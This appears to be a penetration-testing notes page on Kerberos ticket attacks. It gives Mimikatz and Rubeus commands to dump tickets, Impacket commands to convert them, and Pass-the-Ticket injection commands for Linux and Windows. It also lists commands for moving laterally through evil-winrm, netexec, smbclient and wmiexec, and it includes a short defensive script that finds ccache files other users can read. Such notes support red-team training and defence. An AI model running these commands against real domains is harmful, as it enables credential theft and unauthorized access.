PRIMARY CATEGORY → KERBEROS

Theory

CCache

On domain-joined Linux machines, the sensitive information related to an active logon session is not held in the memory space of LSASS.exe, as is the case on Windows

In this case, Kerberos tickets and encryption keys are stored on the file system instead of in memory, in the following types of files →

Kerberos Credential Cache

Temporary file which stores Kerberos credentials belonging to a Kerberos Principal, usually a user account

It stores →

  • Ticket Granting Ticket (TGT)
  • Ticket Granting Service (TGS)

It allows a client to authenticate to other domain services using the TGT stored in this file, without having to provide the password again

It is usually stored in /tmp

To list the content of this file →

klist -c <ccache_file>

In order to use a Credential Cache file, its path must be specified in the KRB5CCNAME environment variable
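A defensive check for the point above (caches live in /tmp and are only as protected as their file permissions), as an added example that is not from the original page: it identifies ccache files by their magic bytes rather than by name and flags any that group or other users can read. The directory, file names and contents are constructed sample data.

```python
"""Audit a directory (normally /tmp) for Kerberos credential caches readable by
other local users. Added example for this page, not part of the krb5 tooling."""
import os
import stat
import tempfile

CCACHE_MAGIC = b"\x05"  # FILE: ccache starts with 0x05, then version 0x01..0x04

def is_ccache(path: str) -> bool:
    """Check the content instead of trusting a krb5cc_* name."""
    try:
        with open(path, "rb") as f:
            head = f.read(2)
    except OSError:
        return False
    return len(head) == 2 and head[:1] == CCACHE_MAGIC and 1 <= head[1] <= 4

def find_exposed_ccaches(directory: str):
    """Return [(name, mode)] for caches readable by group or others; kinit/sssd
    create them 0600, and a looser mode lets another local account reuse the TGT."""
    exposed = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        st = os.lstat(path)
        if not stat.S_ISREG(st.st_mode) or not is_ccache(path):
            continue
        if st.st_mode & (stat.S_IRGRP | stat.S_IROTH):
            exposed.append((name, oct(stat.S_IMODE(st.st_mode))))
    return exposed

def build_sample_dir() -> str:
    """Constructed sample /tmp: two fake caches (magic bytes only), one text file."""
    d = tempfile.mkdtemp()
    samples = {
        "krb5cc_1000": (b"\x05\x04" + b"\x00" * 30, 0o600),  # owner-only: fine
        "krb5cc_1001": (b"\x05\x04" + b"\x00" * 30, 0o644),  # world-readable: flag
        "notes.txt": (b"just a text file", 0o644),            # not a cache: ignore
    }
    for name, (data, mode) in samples.items():
        path = os.path.join(d, name)
        with open(path, "wb") as f:
            f.write(data)
        os.chmod(path, mode)
    return d

if __name__ == "__main__":
    for name, mode in find_exposed_ccaches(build_sample_dir()):
        print(f"EXPOSED: {name} ({mode}) is readable by other local users")
```

Run it against the real /tmp by calling find_exposed_ccaches("/tmp") instead of the sample directory.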

Keytab

Kerberos Key Table

It contains Kerberos Key/Principal pairs

It stores all the Kerberos Encryption Keys

  • NTLM Hash
  • AES-128
  • AES-256

Note that the above keys are derived from the user's password

To list information about a Keytab file →

klist -k -t <keytab_file>
Identifying a Domain-Joined Linux Machine

Realm

command -V realm &> /dev/null && realm list

Pgrep

pgrep --full --list-full -- 'winbind|sssd'

Harvesting Kerberos Tickets

Mimikatz


All Kerberos Tickets on the System

Elevated privileges are needed because the sekurlsa module is used

  • Export Kerberos Tickets to .KIRBI Files

mimikatz.exe 'privilege::debug' 'token::elevate' 'sekurlsa::tickets /export' exit

  • Export Kerberos Tickets to Base64 Format

mimikatz.exe 'privilege::debug' 'token::elevate' 'standard::base64 /output:true' 'sekurlsa::tickets /export' exit

All Kerberos Tickets in the Current Session

Elevated privileges are not needed because the kerberos module uses the official Microsoft Kerberos API

  • Export Kerberos Tickets to Base64 Format

mimikatz.exe 'standard::base64 /output:true' 'kerberos::list /export' exit
Rubeus


TGTs and TGSs (All Kerberos Tickets)

If executed from a privileged context, all Kerberos tickets on the system are listed; otherwise, only those in the current logon session are listed

rubeus.exe dump /nowrap

All TGTs on the System

Elevated privileges needed

rubeus.exe dump /service:krbtgt /nowrap

Ticket Conversion

CCache → Kirbi

ticketConverter.py - Impacket

ticketConverter.py <CCACHE> <KIRBI>

Kirbi → CCache

ticketConverter.py - Impacket

ticketConverter.py <KIRBI> <CCACHE>

Kirbi → Base64

Base64

Linux 🐧

base64 -w 0 -- <KIRBI>

[Convert]::ToBase64String

Windows (PS) 🪟

[Convert]::ToBase64String([IO.File]::ReadAllBytes("<KIRBI>"))

Ticket Injection - Linux

KRB5CCNAME

The only thing we need in order to perform Pass the Ticket on a Linux machine is a Credential Cache file that we have read permissions on

So we can import that Credential Cache into our current session →

export KRB5CCNAME=<CCACHE_FILE>

And check it as follows →

klist

From that, we can perform Pass the Ticket using tools that support Kerberos Authentication as indicated here


Ticket Injection - Windows

Logon Session Types

Mimikatz


Current LUID

No elevated privileges needed; the kerberos module is used

mimikatz.exe 'kerberos::ptt "<KIRBI_FILE>"' exit # KIRBI's Full Path

Another LUID

No elevated privileges needed; the kerberos module is used

  • Creation of a Logon Session of type 9 (NewCredentials) with dummy credentials

Runas

runas.exe /netonly /user:<USERNAME> cmd.exe # Or Powershell.exe

  • Ticket injection into the newly created Logon Session

mimikatz.exe 'kerberos::ptt "<KIRBI_FILE>"' exit # KIRBI's Full Path

Rubeus

.KIRBI

rubeus ptt /ticket:<KIRBI>

Base64 String

rubeus ptt /ticket:<BASE64_STRING>

Passing the Ticket

Setup

As mentioned, an attacker can forge some Kerberos tickets without needing to harvest them from Credential Cache files

This can be done if the Kerberos Encryption Keys (EKeys) of a given Kerberos Principal are obtained from somewhere

First, simply install the following package on your attacking host

apt install -y -- krb5-user

In order to correctly contact the Domain Controller (DC) of a given domain, some parameters must be specified in the following configuration file

/etc/krb5.conf

Configuration Parameters →

[libdefaults]
    default_realm = <DOMAIN.TLD>

...SNIP...

[realms]
    <DOMAIN.TLD> = {
        kdc = <DC01.DDD>
    }

...SNIP...

The above directives are necessary because some tools, such as Evil-WinRM, use this file as a reference

This package also provides us with tools such as klist or kinit

Evil-WinRM


Important: see this

evil-winrm --ip <TARGET> --realm <REALM>

Netexec

netexec <PROTOCOL> <TARGET> --use-kcache

Smbclient

smbclient --use-kerberos=required --no-pass --list <TARGET>

Impacket

Smbclient.py

smbclient.py -k -no-pass <TARGET>

WMIExec.py

wmiexec.py -k -no-pass <TARGET>

PSExec.py